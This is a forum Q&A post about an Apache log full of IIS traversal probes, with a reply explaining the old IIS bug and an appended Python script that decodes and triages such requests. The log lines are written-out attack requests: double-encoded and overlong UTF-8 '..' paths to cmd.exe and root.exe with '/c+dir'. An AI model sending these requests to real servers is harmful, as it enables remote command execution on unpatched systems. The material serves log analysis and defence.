Q&A
Please take a look at this Apache log file~
2002.07.05 21:29
211.237.gdfg - - [05/Jul/2002:19:38:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
211.237.dfg7 - - [05/Jul/2002:19:38:13 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.fdg - - [05/Jul/2002:19:38:13 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dg- - [05/Jul/2002:19:38:13 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:38:13 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg - - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dgf- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
211.237.dfg- - [05/Jul/2002:19:43:49 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dg- - [05/Jul/2002:19:43:49 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:50 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
211.237.dfg97 - - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dfg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
211.237.dg- - [05/Jul/2002:19:43:59 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
211.237.dgfg7 - - [05/Jul/2002:19:44:02 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
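I have Apache, PHP and MySQL installed and running on Windows 2000.
To try out what I learned recently, I gave accounts to a few people..
and the activity of one of them was recorded in the log file like this..
What is with winnt/system32 ;; How did they get access to that folder? ;;
And isn't cmd the shell program?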
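IIS has had quite a few bugs, and in the past there was a bug that allowed access in the way shown in the log above.
Of course, on a Win2k machine that is still running unpatched, the access above does work...
Since this is related to IIS, I don't think you need to worry much about it on Apache.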
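
As an added example (not part of the original thread), the Python sketch below triages request lines like those in the question: it percent-decodes each target repeatedly, tags double-encoded and overlong UTF-8 traversal attempts aimed at cmd.exe or root.exe, and uses the status code to separate refused probes from responses worth a closer look. The client address in the sample is a constructed placeholder, and the tag names and the rule that a status of 400 or above means "rejected" are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: request lines as in the question, placeholder client address.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jul/2002:19:38:13 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
192.0.2.10 - - [05/Jul/2002:19:38:13 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
192.0.2.10 - - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
192.0.2.10 - - [05/Jul/2002:19:38:14 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
192.0.2.10 - - [05/Jul/2002:19:40:00 +0900] "GET /index.php HTTP/1.0" 200 1024
"""

# Apache common log format: host ident user [time] "method target proto" status bytes
LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')

def decode_rounds(target, limit=3):
    """Percent-decode repeatedly; return (final bytes, number of rounds that changed it)."""
    data, rounds = target.encode("latin-1"), 0
    for _ in range(limit):
        nxt = unquote_to_bytes(data)
        if nxt == data:
            break
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(target):
    """Return tags (names are this example's own) describing the probe technique."""
    decoded, rounds = decode_rounds(target)
    tags = []
    if re.search(rb"(cmd|root)\.exe", decoded, re.I):
        tags.append("iis-shell-probe")
    if rounds > 1:  # e.g. %255c -> %5c -> backslash
        tags.append("double-encoded")
    if b"\xc0" in decoded or b"\xc1" in decoded:  # 0xC0/0xC1 never occur in valid UTF-8
        tags.append("overlong-utf8")
    if re.search(rb"\.\.[\\/]", decoded):
        tags.append("traversal")
    return tags

def triage(log_text):
    """List (target, status, tags, verdict) for every suspicious request line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        tags = classify(m["target"]) if m else []
        if tags:
            status = int(m["status"])
            # Assumption of this example: a 4xx/5xx status means the probe was refused.
            verdict = "rejected" if status >= 400 else "investigate"
            findings.append((m["target"], status, tags, verdict))
    return findings
```

Calling `triage(SAMPLE_LOG)` returns four findings, all with the verdict "rejected", which matches the 404 and 400 responses Apache gave in the log above.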